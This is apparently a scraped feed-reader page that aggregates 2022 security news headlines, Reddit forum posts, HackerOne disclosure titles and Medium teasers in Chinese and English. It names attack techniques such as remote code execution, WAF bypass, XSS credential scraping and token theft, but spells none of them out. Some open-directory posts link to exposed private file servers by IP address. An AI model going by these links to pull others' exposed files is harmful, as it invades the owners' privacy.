    基于追踪标记的WAF设计思路
    本文所述WAF不仅具有传统WAF的功能,同时可识别并追踪攻击者。
    Mangatoon 数据泄露,超两千万账户受影响
    漫画阅读平台Mangatoon遭遇数据泄露事件,一名黑客窃取并曝光了超2300万名用户的账户信息。
    迪士尼Instagram和Facebook帐户被黑,并被威胁行为者发布恶意内容
    迪士尼Facebook和Instagram账户被一名自称“超级黑客”的人入侵。
    马来西亚数据合规重点解读
    马来西亚是较早践行数据保护的国家,其早于 2010年即颁布了《个人数据保护法》,规范个人数据收集、使用以及披露等行为。
    多款本田车型存在漏洞,车辆可被远程控制
    部分本田车型存在Rolling-PWN攻击漏洞,该漏洞可能导致汽车被远程控制解锁甚至是被远程启动。
    剑思庭:工控安全虽小众,但潜力无限 | TTSP安全智库专家访谈
    他从业的六年,刚好也是工控安全开始明显增长的六年。近期,他接受FreeBuf专访,谈起工控安全的发展历程以及未来的方向。
    新的 0mega 勒索软件针对企业进行双重勒索攻击
    名为“0mega”的新勒索软件针对全球组织进行双重勒索攻击,并要求受害企业支付数百万美元赎金。
  • Open

    Data Science & infosec
    Hi all, A bit background I work in a risk management role but I'm just some what starting out and got comfortable. Of course I miss the technical and programming world. That being said I want to do a data analytics/visualization project but not sure what risks or what areas of infosec would be most valuable to really any organization's CISO or IT security but also an area of infosec that has data I could use. So my question is what data related project in infosec can I do that involves data viz & analytics? I've done some research but could find up to date datasets. I also want to say that it would be cool to see deep web related stuff for example scanning forms and triggering if I get an organization's name? But maybe that's a bit too advanced Thanks! submitted by /u/ceizaralb [link] [comments]
  • Open

    EXIF - ImageUniqueID
    Hi, Does anyone have some knowledge around "ImageUniqueID" when analyzing images? I found that this id should be unique for every taken picture, but what if multiple images have the same "unique" id? Am I right in saying that two pictures that has the same "ImageUniqueID" has been captured with the same device? ​ Thankful for any response! submitted by /u/lasagne_forensics [link] [comments]
  • Open

    RCE 宝典!
    作者:ZAC安全 原文链接:https://mp.weixin.qq.com/s/gtArMfC2Xq9IEpwvu8Sszg 00 前言与基础概念 RCE全称 remote command/code execute 远程代码执行和远程命令执行,那么RCE的作用呢?就相当于我可以在你的电脑中执行任意命令,那么就可以进而使用MSF/CS上线你的主机,就可以完全控制你的电脑了,所以做渗透中,个人...
  • Open

    RCE 宝典!
    作者:ZAC安全 原文链接:https://mp.weixin.qq.com/s/gtArMfC2Xq9IEpwvu8Sszg 00 前言与基础概念 RCE全称 remote command/code execute 远程代码执行和远程命令执行,那么RCE的作用呢?就相当于我可以在你的电脑中执行任意命令,那么就可以进而使用MSF/CS上线你的主机,就可以完全控制你的电脑了,所以做渗透中,个人...

  • Open

    Homograph attack bypass cause redirection
    Vanilla disclosed a bug submitted by malek: https://hackerone.com/reports/1285245 - Bounty: $50
    Blind SSRF at packagist.maximum.nl
    Radancy disclosed a bug submitted by dk4trin: https://hackerone.com/reports/1538056 - Bounty: $75
  • Open

    Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro
    Welcome back my fellow hackers, today we are continuing the series of showcasing Red Teaming TTPs by trying to weaponize a custom C2… Continue reading on System Weakness »
    Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro
    Welcome back my fellow hackers, today we are continuing the series of showcasing Red Teaming TTPs by trying to weaponize a custom C2… Continue reading on Medium »
    Active Directory — Abusing a Kerberos Resource
    Hello Hackers! Continue reading on Medium »
  • Open

    Sandboxing python modules in your code
    No content preview
    Hunting malwares with Yara
    No content preview
  • Open

    Sandboxing python modules in your code
    No content preview
    Hunting malwares with Yara
    No content preview
  • Open

    Sandboxing python modules in your code
    No content preview
    Hunting malwares with Yara
    No content preview
  • Open

    SecWiki News 2022-07-10 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-10 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    挖矿病毒
    以下所有操作均在centos 7系统下完成!只供参考,各国禁止黑客非法攻击行为,后果自负!
    记一次真实渗透排序处发现的SQL注入学习
    快速发现sql注入并通过burp跑出数据库名的小技巧。
    Java代码审计之XSS
    XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。
    在线编程 IDE = 远程网络攻击?
    黑客通常使用受感染的机器而不是直接从个人拥有的设备发起攻击,这使他们能够隐藏其来源。
    【由浅入深_打牢基础】一文搞懂XPath 注入漏洞
    XPath的作用就是用于在XML或HTML中查找信息,就像SQL语句的作用是在数据库中查询信息一样。
    数字藏品平台清退需承担哪些责任?
    本文将从平台“格式条款”切入,探讨数字藏品平台方在退出市场时有可能承担的法律责任。
  • Open

    Identifying and verifying Chinese PLA Navy with OSINT.
    Ship recognition is still important, sailors in the navy still receive lessons in visual recognition. Yet the attention seems to be… Continue reading on Medium »
    How to organize monitoring of your reputation in the media?
    Let’s learn how to monitor our reputation background in russian online media today. Today it is becoming a must for any public person. Continue reading on Medium »
    SPY NEWS: 2022 — Week 27
    Summary of the espionage-related news stories for the Week 27 (July 3–9) of 2022. Continue reading on Medium »
    Attacks via a Representative Sample : Myths and Reality
    Imagine the situation: you are an employee of a secret service, and your task is to calculate a particularly dangerous criminal, engaged… Continue reading on Medium »
  • Open

    Status, Vulnerability, and Status Vulnerability
    Article URL: https://eriktorenberg.substack.com/p/status-vulnerability-and-status-vulnerability Comments URL: https://news.ycombinator.com/item?id=32043881 Points: 1 # Comments: 0
  • Open

    Practical Approach on Securing Web Sessions
    submitted by /u/quercialab [link] [comments]
  • Open

    Free cybercrime intelligence tool - check any company domain and see how many of their employees and clients were compromised by info-stealers
    Check domains for free across our database of over 5,700,000 computers compromised with info-stealers world wide - https://www.hudsonrock.com/are-you-compromised Also available via https://inteltechniques.com/tools/Breaches.html under "HudsonRock" What is it? - this free tool enables you to search for domains and see how many compromised employees & users they have from our continuously augmented cybercrime database, this can be useful for several reasons: Risk assessment - looking up a company and seeing they have a lot of compromised employees can indicate the company is not up to date with proper security measures, each compromised employee indicates that someone in the company downloaded and executed an info-stealing malware and had all their corporate credentials, cookies, docume…
  • Open

    Best offline AV/Scan bootable
    Need to retreive ~128G og files from a suspected corrupted USB drive received from an untrustworthy source. No other way to capture source data. Been years since I have been in need of a bootable AV and dont recognize the product landscape. Looking for a scanner which can target specified external USB drives. Bonus if it does everything from rootkits to malware and more. submitted by /u/QuantumFiddle [link] [comments]
    Computer Ransomwared
    My aunts company had a few computers ransomwared. Where on the tor could I go look to see if any of her data is for sale. I found a couple of old links. Anyone have any sources? submitted by /u/jamestech221 [link] [comments]
  • Open

    Couple with movies/tv etc. 1 posted about a year ago, the other... new to us it would seem!
    http://www.moviefyy.com/ EDIT: removed cause it does indeed have some personal info (and frankly huge wedding photo files!) Prophylactic [NSFW] tag just in case. submitted by /u/ringofyre [link] [comments]
    New to OD, need advice on how to open video files
    How do i open files like this one (AVI and other video files, already tried using VLC didn't work) https://www.mmnt.net/db/0/0/89.178.3.122/sdb1/Big%20Tit%20Superstars%20Of%20The%2070's%20-%20Carol%20Connors is the file broken or is there any other way? submitted by /u/Pink__banana [link] [comments]
    Decade Old PC software and drivers
    http://31.48.171.80:86/Public/Software/ submitted by /u/SeniorAlbatross [link] [comments]
    Czech/Slavic Ebooks
    submitted by /u/SeniorAlbatross [link] [comments]

  • Open

    RouterSpace From Hackthebox
    No content preview
    Exposing Millions of Voter ID card user’s details.
    No content preview
    Docker: Creating a Pivoting Lab and Exploiting it
    No content preview
    HackTheBox Writeup: RouterSpace
    No content preview
    How I Hacked My College Server?
    No content preview
    IW Weekly #7: Facebook account takeover, Java Deserialization, SSRF, and more…
    No content preview
  • Open

    RouterSpace From Hackthebox
    No content preview
    Exposing Millions of Voter ID card user’s details.
    No content preview
    Docker: Creating a Pivoting Lab and Exploiting it
    No content preview
    HackTheBox Writeup: RouterSpace
    No content preview
    How I Hacked My College Server?
    No content preview
    IW Weekly #7: Facebook account takeover, Java Deserialization, SSRF, and more…
    No content preview
  • Open

    RouterSpace From Hackthebox
    No content preview
    Exposing Millions of Voter ID card user’s details.
    No content preview
    Docker: Creating a Pivoting Lab and Exploiting it
    No content preview
    HackTheBox Writeup: RouterSpace
    No content preview
    How I Hacked My College Server?
    No content preview
    IW Weekly #7: Facebook account takeover, Java Deserialization, SSRF, and more…
    No content preview
  • Open

    DoS via lua_read_body() [zhbug_httpd_94]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1596252 - Bounty: $480
    Apache HTTP Server: mod_proxy_ajp: Possible request smuggling
    Internet Bug Bounty disclosed a bug submitted by ricterz: https://hackerone.com/reports/1594627 - Bounty: $2400
    Read beyond bounds via ap_rwrite() [zhbug_httpd_47.2]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595299 - Bounty: $480
    Read beyond bounds in mod_isapi.c [zhbug_httpd_41]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595296 - Bounty: $480
    Controllable read beyond bounds in lua_websocket_readbytes() [zhbug_httpd_126]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595290 - Bounty: $480
    Read beyond bounds in ap_strcmp_match() [zhbug_httpd_47.7]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595281 - Bounty: $480
  • Open

    Does "Autostart" Really Mean "Autostart"?
    Most DFIR and SOC analysts are familiar with the Run keys as autostart locations within the Windows Registry: [HKLM|HKCU]\Software\Microsoft\Windows\CurrentVersion\Run Values beneath these keys are automatically run asynchronously upon system start and user login, respectively. This is something we've know for a while, and we've dutifully incorporated these autostart locations into our "indicators of program execution" artifact category. It turns out, that may not be the case. Wait...what? Did I just say that a value listed in one of the aforementioned Run keys may not, in fact, be executed at system start or user login??  Yes...yes, I did. Let's first start with validating that the entries themselves have been run. We know that we can parse the  Microsoft-Windows-Shell-Core%4Operational E…
  • Open

    HacktheBox[routerspace]
    Initial full TCP Nmap scan of the box reveals ports 80 and 22 are open: Continue reading on Medium »
  • Open

    SecWiki News 2022-07-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    ATT&CK Execution技术攻防
    文章中很多内容没有进一步展开讨论,如果读者感兴趣,可以私聊或者在评论区讨论。
  • Open

    Figuring out what I want to be when I grow up
    I'm a just over 40 y/o IT Professional who in the last couple of years managed to get out of system administration to now working in a SOC. In the last 5-ish years I got my Security+, CySA+ and CISSP. Currently my role in the SOC is more of an administrator of tools that the the IR and Vulnerability people use, and not much hands on using the tools. I'm trying to figure out what direction I should go and what my next steps should be, and if there is a title/job description (not literally) that I should look towards as a goal for the time being. At this time I don't want to go into a management area, I like having my hands on keyboards and not in meetings. I do like doing the vulnerability scanning and remediation, the only thing in my current workplace the vulnerability team does the scanning and informs the administrative teams what needs to be remediated. Incident Response and Threat analytics sounds interesting but also high stress. I've been looking at penetration testing and red teaming as a direction to study but as I'm going through stuff I don't feel like I have the temperament of "gotta pwn the system" and because of that I feel like there are younger people better suited to doing that. What conceptually sounds good to me is something like being a consultant where I'm part of a team that does the security assessment for organizations and helps to identify where the vulnerabilities are, do the risk analysis and remediate the issues. I may have answered my own question with that, but is there a job role/title like that which I can use as a guide to figure out what sort of training I need to position myself for it? submitted by /u/beerdini [link] [comments]
    POV: you are at your favorite cafe with a hacker who hijacked the router.
    You are a cyber security specialist who enter the café with your laptop to check your company's self-hosting email server while sipping your favorite latte "or whatever drink you want to sip". You have connected your laptop to the public access point who was setup by a self-hating person who didn't even bother to change router's credentials (usr=admin, pass=admin). There is a hacker who were sent by your company's competitor and he's in the same shop you're in but you can't tell since there are 4 people connected to the same hotspot as you are using their own laptops (total of 5 people currently connected to the Wi-Fi hotspot). The hacker took advantage of that and changed the router's credentials and gained complete control of the ISP-provided router before initiating his attack and his goal is to eavesdropping on your company's plans and secrets. What sort of unauthorized attack can the hacker do to eavesdrop. How would you defend yourself against the attacker (assuming you started to suspect after you have connected to the same hotspot for a while using no vpn). What would you do to spot the hacker. submitted by /u/6TedtheUnDead9 [link] [comments]
    Vulnerability scanning tools for multi-networks?
    I’m looking to start a vulnerability management business. I’m aware of tools such as Nessus, nexpose etc. I’m looking for a tool, paid or open source to start. I’m wanting to do vulnerability scans on multiple different networks, doing the vulnerability scans for businesses and giving them the CVE reports. Is there any tools that would be good for this? Nessus, and nexpose seem to be good for a permanent solution for a single business that manages their own vulnerability scans, where I need more of something that I can use on multiple networks. OpenVAS appears to be free but not a good solution for multiple different networks, especially not scanning servers. Any thoughts or advice would be appreciated Thanks In advance submitted by /u/AggravatingShame576 [link] [comments]
  • Open

    Fuzzing the Rust Typechecker Using Constraint Logic Programming [pdf]
    Article URL: https://sites.cs.ucsb.edu/~benh/research/papers/dewey15fuzzing.pdf Comments URL: https://news.ycombinator.com/item?id=32034841 Points: 2 # Comments: 0
  • Open

    photos of physicists
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Been posted here before, but it's regularly updated.
    Last posted 158Days ago. http://192.64.86.228/%5bb%5d/ Credits to u/JiminythecricketinOz submitted by /u/amritajaatak [link] [comments]

  • Open

    How I hacked the JEE coaching Website and shutdown the class live-stream
    STORY Continue reading on Medium »
    The Ultimate Kali Linux Book
    Perform advanced penetration testing using Nmap, Metasploit, Aircrack-ng, and Empire Continue reading on Medium »
    How Burpsuite-pro helped me to get a 5 digit Bounty !
    Hello ppl, This is Aravind here with another awesome write-up. So now am gonna tell the story about how burpsuite pro helped me to get a 5… Continue reading on Medium »
    APT Groups with AI Generated Images
    I ran some APT Group names through Google’s AI image generator. Results are probably what you’d expect. Continue reading on Medium »
    Finding SQL Injections through source code in .NET applications
    CodeAllTheThings Continue reading on Medium »
    Innovation in the Free World
    Objective Reviewers Continue reading on Medium »
    Account Takeover via Response Manipulation
    Hello everyone I am Abhishek pal here* with my First blog ,In this blog I am going to give details about an easy P1 bug I encountered… Continue reading on Medium »
  • Open

    [OSINT Walkthrough] Solving a Twitter OSINT Challenge #01
    I’ve notice a lot of good Twitter OSINT challenges lately, so I decided to take some of them. This will be a series of OSINT challenges… Continue reading on Medium »
    Ethereum (ETH) investigations
    Ethereum (ETH) is the second most popular cryptocurrency in the world, as well as a platform for creating decentralized online services… Continue reading on Medium »
    Kremlin’s “fervid patriotism” and the emergence of “vozmezdiye”
    Sifting through the claims made by Russia from Bucha to Kremenchuk, all what the fact-checkers have found is a string of blatant lies. Continue reading on Medium »
    War in Ukraine / July 7
    HIMARS slow down the advance of Russian troops Continue reading on Medium »
  • Open

    Unauthorized packages modification or secrets exfiltration via GitHub actions
    Hyperledger disclosed a bug submitted by dusty_wormwood: https://hackerone.com/reports/1548870 - Bounty: $1500
    Open Redirect through POST Request in www.redditinc.com
    Reddit disclosed a bug submitted by kratul: https://hackerone.com/reports/1310230
    Exposed valid AWS, Mysql, Sendgrid and other secrets
    Glovo disclosed a bug submitted by mehdisadir: https://hackerone.com/reports/1580567
  • Open

    SecWiki News 2022-07-08 Review
    全国攻防演习的防守体系建设 by ourren 一种全新的内存马 by ourren 自建可信钓鱼邮件服务器 by ourren 在软件工程领域,搞科研的这十年! by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-08 Review
    全国攻防演习的防守体系建设 by ourren 一种全新的内存马 by ourren 自建可信钓鱼邮件服务器 by ourren 在软件工程领域,搞科研的这十年! by ourren 更多最新文章,请访问SecWiki
  • Open

    Syndication.photoslibrary... What is this thing?
    I'm am trying to figure out this path for the Syndication.photos library folder. The device I am working on is an iPhone 11running iOS 15.5. There is a video stored within the following path: private/var/mobile/Library/Photos/Libraries/Syndication.photoslibrary/scopes/syndication/originals/ This video appears in the camera roll with the iOS naming (IMG_XXXX.mp4) and shows it was downloaded from a messaging app. When it is located at the syndication folder, it appears to have a hexidecimal value for the naming convention, and ending in .mp4. There is also an instance of this video in the SMS/Attachments path, ending with the IMG_XXXX.mp4, with the same hash value. When searching for the IMG_XXXX naming convention, all the other file hits go to private/var/mobile/Media/PhotoData/... There …
  • Open

    Let’s Learn about Cookie and Its Security
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Let’s Learn about Cookie and Its Security
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Let’s Learn about Cookie and Its Security
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Bugs, pests and Crops!
    How do I keep finding these. Buncha bugs, Pests, crop viruses, crops, and insects. https://www.thesheepsite.com/diseaseinfo/images/ https://agritech.tnau.ac.in/crop_protection/rice/ http://vegetablemdonline.ppath.cornell.edu/Images/ submitted by /u/amritajaatak [link] [comments]
    Tons of random stuff (Software, Movies, Shows)
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Scanning 1.7 million Australian domains and finding 1.62 million SPF & DMARC security issues
    submitted by /u/caniphish_ltd [link] [comments]
  • Open

    12万从业者同频!CIS网络安全创新大会·夏日版“元宇宙”齐冲浪
    8小时直播,20余议题,12万网安从业者们的夏日冲浪趴圆满落幕!
    「斗象攻防演练宝典」之弱密码如何“扫雷”
    见微密码安全审计系统,帮助企业在攻防演练中解决弱口令问题,全方位、多角度的完善用户安全体系建设
    参数化导致的WAF绕过研究
    前面的两篇文章中,我们已经对编码和normalize这两个阶段可能造成的WAF绕过进行了分析。按之前文章分析结论,参数化是整个WAF工作过程中的又一个重要阶段,在这个阶段中同样存在可以绕过WAF的思路
    苹果将推出新安全功能“封锁模式”,可保护设备免受间谍软件攻击
    苹果公司宣布,计划在iOS 16、iPadOS 16和macOS Ventura中引入一种新模式Lockdown Mode(封锁模式)。
  • Open

    External Attack Surface Management for Red Teaming
    The modern cyber threat landscape sees an ever-expanding influx of malicious actors using a slew of tactics, techniques, and tools to… Continue reading on Medium »
  • Open

    CVE-2022-33980: Apache Commons Configuration2 Arbitrary Code Execution
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-33980 Comments URL: https://news.ycombinator.com/item?id=32024034 Points: 2 # Comments: 0
  • Open

    "Password protection" in Azure
    Hi there. Can someone explain how works password protection in Azure? As I understand it bans a variety of one word, for example, if users like to use passwords like qwerty123!, 123qwerty%, qwertyyy4636, etc. I can ban them by the word "qwerty", yes? If there are such passwords: Qwer1234!@#$ Q!w2e3r4t5 Qwedcxzas4 And to ban them, I can use the only one word qwerty? Or do I need to use the separate words for each other? Qwer1234!@#$ -> qwer Q!w2e3r4t5 -> qwert (or no?) Qwedcxzas4 ->qwedcxzas submitted by /u/athanielx [link] [comments]

  • Open

    Clickjacking Vulnerability In Whole Page Ads Tiktok
    TikTok disclosed a bug submitted by rioncool22: https://hackerone.com/reports/1418857 - Bounty: $500
    HTTP Request Smuggling Due to Flawed Parsing of Transfer-Encoding
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1524555
    HTTP Request Smuggling Due To Improper Delimiting of Header Fields
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1524692
    HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1501679
    Brute force of a current password on a disable 2fa leads to guess password and disable 2fa.
    Omise disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1465277
    Remote denial of service in HyperLedger Fabric
    Hyperledger disclosed a bug submitted by fatal0: https://hackerone.com/reports/1604951 - Bounty: $1500
    Stack Buffer Overflow via `gmp_sprintf`in `BLSSignature` and `BLSSigShare`
    SKALE Network disclosed a bug submitted by voiddy: https://hackerone.com/reports/1546935 - Bounty: $2500
  • Open

    Laptop HP Forensic Image
    Hello, I wanted to see if anyone could help me out. I have an old laptop that I want to mess with, so I can learn how to create an image of it. How can I extract an image from my HP laptop, what forensic tools can I use? Any YouTube videos or websites that show a step by step how to do this? Thanks in advance! submitted by /u/Sudden_Ad9859 [link] [comments]
    Odd FTK Imager behavior
    Got a micro SD card from dash cam to analyze. In Windows Explorer, via write blocker, the card looks formatted by Android with typical folders you would see if used in a phone. In FTK Imager, I see the folders and subfolders for the dash cam. Found hundreds of videos. A month later, I open FTK Imager, same version, and view the card again, only this time I only get the Android data. I cannot locate the dash cam folders or videos. I have rolled back to earlier versions of FTK Imager and tried Windows 11, 10, and 7. Has anyone ever experienced something like this before or possibly have any recommendations for next steps to try. Thanks in advance. submitted by /u/rgc_71 [link] [comments]
    Evtx Rules
    Hello everyone, Hope you all had a great holiday. I have the following situation pulled from an .EVTX log, and I am wondering if there is a log or file that tells me what "specific words" rule was deleted please. "Microsoft Outlook Delete rule "Delete messages with specific words"? submitted by /u/clarkwgriswoldjr [link] [comments]
    A DIY Windows forensics challenge
    Hi all, I thought this is helpful for anyone wanting to get their hands on a Windows system with realistic attack patterns to perform a forensic analysis on it. I've published a Github repo that includes a script, based on AtomicRedTeam, which will run a few selected atomic techniques that are great for beginner and medium experienced analysts to practice forensics. You can completely run it on your own lab / Windows system (e.g. trial version). I published this as part of a course that is nowadays available on The Cyber Mentor Academy for cheap (full disclaimer!), however, there's no need for the course to get this going. It's a way to provide students with the opportunity to create their own forensic evidence and practice the full forensic process, which I wish was around when I started learning this. Practical windows forensics Github repo: https://github.com/bluecapesecurity/PWF Hope this is helpful for people! submitted by /u/masch_aut [link] [comments]
    iOS Synced Data Metadata/Artefacts:
    Let’s assume we are examining a file system extraction of an iPhone; is there a way to tell which data on the device was synced onto the device? e.g. if we narrowed down to iMessages would there be a database/PLIST file which contains that info? submitted by /u/1-bitbybit-0 [link] [comments]
  • Open

    Mostly Linux-related stuff but contains stuff like Samsung smart view and his cpuinfo output
    submitted by /u/themariocrafter [link] [comments]
  • Open

    how to find information disclosure bugs (:
    hello 👋 people of the internet so this is my frist writeup i hope i don’t suck that much. Continue reading on Medium »
    PII Disclosure of Apple Users ($10k)
    How I hacked Apple and was able to Disclose Apple Users Private Shipping Information and Mobile Numbers. Continue reading on Medium »
    Awesome Bug Bounty Tools
    Continue reading on Medium »
  • Open

    Koh: The Token Stealer
    Years ago I was chatting with a few experienced red teamers and one was lamenting token abuse. Specifically, they wanted to be able to… Continue reading on Posts By SpecterOps Team Members »
    Hackers Abusing BRc4 Red Team Penetration Tool in Attacks to Evade Detectionument
    Malicious actors have been observed abusing legitimate adversary simulation software in their attacks in an attempt to stay under the… Continue reading on Medium »
  • Open

    War in Ukraine / July 6
    Britain without Johnson. What does this mean for Ukraine? Continue reading on Medium »
    “Mastering Cyber Intelligence” Notes
    Mastering Cyber Intelligence by Jean Nestor M. Dahj is the best cyber threat intel book I’ve read so far. It’s comprehensive and detailed… Continue reading on Medium »
    Tracking a Person Using OSINT
    Wondering how tech detectives track people using Open Source Intelligence and some Digital Forensics skills? Today I am gonna show a basic… Continue reading on Medium »
    Một số cách để thống kê mục tiêu có gì
    Trong khi đi khai thác thì phải biết được mục tiêu khai thác có những gì phạm vi tới đâu vì chúng ta đứng bên ngoài khai thác vào, các… Continue reading on Medium »
  • Open

    Altiris Methods for Lateral Movement
    submitted by /u/dmchell [link] [comments]
  • Open

    Does anyone have any idea what this is?
    For the past 10 days or so, my friend has been receiving a lot of spam emails such as this one. Written in some sort of a code. Does anyone know how to decipher it? And what it is? https://cdn.discordapp.com/attachments/538420241794072579/994635097288491068/Screenshot_2022-07-07-18-04-38-23_45e686c594768066ad9911d54d96f72b.jpg submitted by /u/Kolur96 [link] [comments]
    how does omegle (p2p chat with randos) work without port forwarding?
    from my understanding two computers can't talk to each other without open ports on either of them if there is a way to make this work what's protecting me from becoming part of botnet by just visiting a website? submitted by /u/GreedyAd9811 [link] [comments]
    InsightVM Scans vs Agents
    Personally I'm new to the insightVM agents, not the authenticated scanning. The company I'm with chose to deploy the agents so they didn't have to use the privilege elevation in scanning, while still performing non-root-level scans. This was all implemented before I joined the company but what I've gathered they were told they didn't need to do elevated privilege scans because they use the agents. There is a lot of complaints of remediation something but insightVM says it's still an issue and insightVM sucks. Essentially blame insightVM as a poor product. Having used insightVM for so many years, I still call it nexpose, many of these vulnerabilities should be getting caught as remediated but arent. So is there something wrong with our implementation or is because we still need the elevated scans? The way I read rapid7 docs is that the agent doesn't replace the scans. Thanks submitted by /u/squirrel_butter [link] [comments]
  • Open

    SecWiki News 2022-07-07 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-07 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Advisory: FESTO: CECC-X-M1 - Command Injection Vulnerabilities
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
    Automating binary vulnerability discovery with Ghidra and Semgrep
    submitted by /u/0xdea [link] [comments]
  • Open

    Apache Commons Configuration insecure interpolation defaults (CVE-2022-33980)
    Article URL: https://lists.apache.org/thread/tdf5n7j80lfxdhs2764vn0xmpfodm87s Comments URL: https://news.ycombinator.com/item?id=32014498 Points: 1 # Comments: 0
  • Open

    Scraping Login Credentials With XSS
    Unauthenticated JavaScript Fun In prior blog posts I’ve shown the types of weaponized XSS attacks one can perform against authenticated users, using their session to access and exfiltrate data, or perform actions in the application as that user. But what if you only have unauthenticated XSS? Perhaps your client hasn’t provided you with credentials to... The post Scraping Login Credentials With XSS appeared first on TrustedSec.
  • Open

    FreeBuf早报 | 中国红客联盟宣布解散并更名;人脸识别漏洞成骗子作案工具
    中国红客联盟官方微博发布公告,即日起宣布解散,并更名为弘客联盟。
    用户认可 | 斗象科技入选2022网络安全“大众点评”百强榜
    安在正式发布《2022中国网络安全产品用户调查报告》,斗象成功入选“大众点评”百强榜!
    为什么API网关不足以保证API安全?API安全之路指向何处
    根据 Gartner 的预测,到 2023 年,超过 50% 的 B2B 交易将摆脱传统方式,转而通过实时 API 进行。
    升级为Rust,Hive勒索软件加密将变得更加复杂
    近期,微软安全部门的研究人员发现了一种名为Hive的升级版勒索软件服务(RaaS),随即安全专家在周二的一份报告中概述了他们的发现,在报告中,专家们阐述了以下观点:随着其最新版本的几个重大升级,Hive也证明了它是发展最快的勒索软件家族之一,也例证了不断变化的勒索软件生态系统。根据微软的说法,Hive勒索软件最新版本的升级代表着对整个勒索软件基础架构的彻底改革,在报告中,专家们还指出最值得注意的变
    FreeBuf周报 | 欧盟举办超大规模网络安全演习;PCI DSS 4.0发布以应对新兴威胁和技术
    各位 FreeBufer 周末好~我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!
    万豪国际数据遭泄露,20GB文件被窃取
    万豪国际连锁酒店遭遇新的数据泄露事件,攻击者从该公司网络中窃取了约20GB的文件。
    一次持续的邮件钓鱼攻击的简单溯源分析,看看是谁在钓鱼?
    1次持续的邮件钓鱼攻击行动的溯源分析
  • Open

    W Weekly #6: Bypassing 2FA, Steghide Challenges, PEStudio Walkthrough, and more…
    No content preview
    Annie From TryHackme
    No content preview
  • Open

    W Weekly #6: Bypassing 2FA, Steghide Challenges, PEStudio Walkthrough, and more…
    No content preview
    Annie From TryHackme
    No content preview
  • Open

    W Weekly #6: Bypassing 2FA, Steghide Challenges, PEStudio Walkthrough, and more…
    No content preview
    Annie From TryHackme
    No content preview

  • Open

    Privilege escalation possible in dovecot when similar passdbs are used
    Open-Xchange disclosed a bug submitted by julezman: https://hackerone.com/reports/1561579 - Bounty: $900
    Ownership check missing when updating or deleting attachments
    Nextcloud disclosed a bug submitted by kesselb: https://hackerone.com/reports/1579820
    Blind User-Agent SQL Injection to Blind Remote OS Command Execution at
    Sony disclosed a bug submitted by echidonut: https://hackerone.com/reports/1339430
  • Open

    7+3 Vulnerable Apps To Get Started With Android Penetration Testing
    There are currently 3.8 billion smartphone users in the world and this number is doomed to rise in the next years. Continue reading on Medium »
    Exposing Millions of Voter ID card user’s details.
    Critical IDOR disclosing millions of Voter ID card details of Individuals on the official voter ID maintaining platform. Continue reading on Medium »
    YOLO Smart Contracts are Coming to a Blockchain Near You
    Explainer and Community Bounty Continue reading on YOLOrekt »
    OTP Bypass through response manipulation.
    Hello Readers, I am Tariq Rafiq Kehar , a bug hunter. Continue reading on Medium »
    Synthetix Logic Error Bugfix Review
    Summary Continue reading on Immunefi »
    How I found Open redirect on Bug crowd public program in 2 day
    Tools : - Burp suite - Burp JS Link Finder Continue reading on Medium »
    How I Got my first bounty $$
    Hello hackers, Continue reading on Medium »
    Dorks Eye-Google Hacking Dork Scraping and Searching Script
    Dorks Eye is a Python 3-based script. You can easily find Google Dorks using this tool. Dork Eye collects potentially vulnerable web pages… Continue reading on Medium »
    Update your Chrome browser now to avoid a dangerous vulnerability
    Google has released a security update for the Chrome browser that fixes a zero-day vulnerability . This bug affects Windows, Mac and… Continue reading on Medium »
    SSRF web application vulnerability.
    What is an SSRF? Continue reading on Medium »
  • Open

    Shvanidzor access restriction: an open-source study
    It is early July 2022 and thus still the school holiday season in Armenia. There is little activity around noon in Shvanidzor. The village… Continue reading on Medium »
    OSINT
    OSINT Stands for Open-Source INTelligence Continue reading on Medium »
    War in Ukraine / July 5
    The next big battle is for Sloviansk Continue reading on Medium »
    Open Source Intelligence
    Open Source Intelligence (OSINT) is intelligence collected from publicly available resources. To take a real-life scenario let’s take that… Continue reading on Medium »
  • Open

    OpenSSL远程代码执行漏洞 (CVE-2022-2274)
    OpenSSL 3.0.4版本在支持AVX512IFMA指令的X86_64 cpu的RSA实现中引入了一个严重的问题。这个问题使得RSA的2048位私钥实现在这样的机器上不正确,并且在计算过程...
  • Open

    OpenSSL远程代码执行漏洞 (CVE-2022-2274)
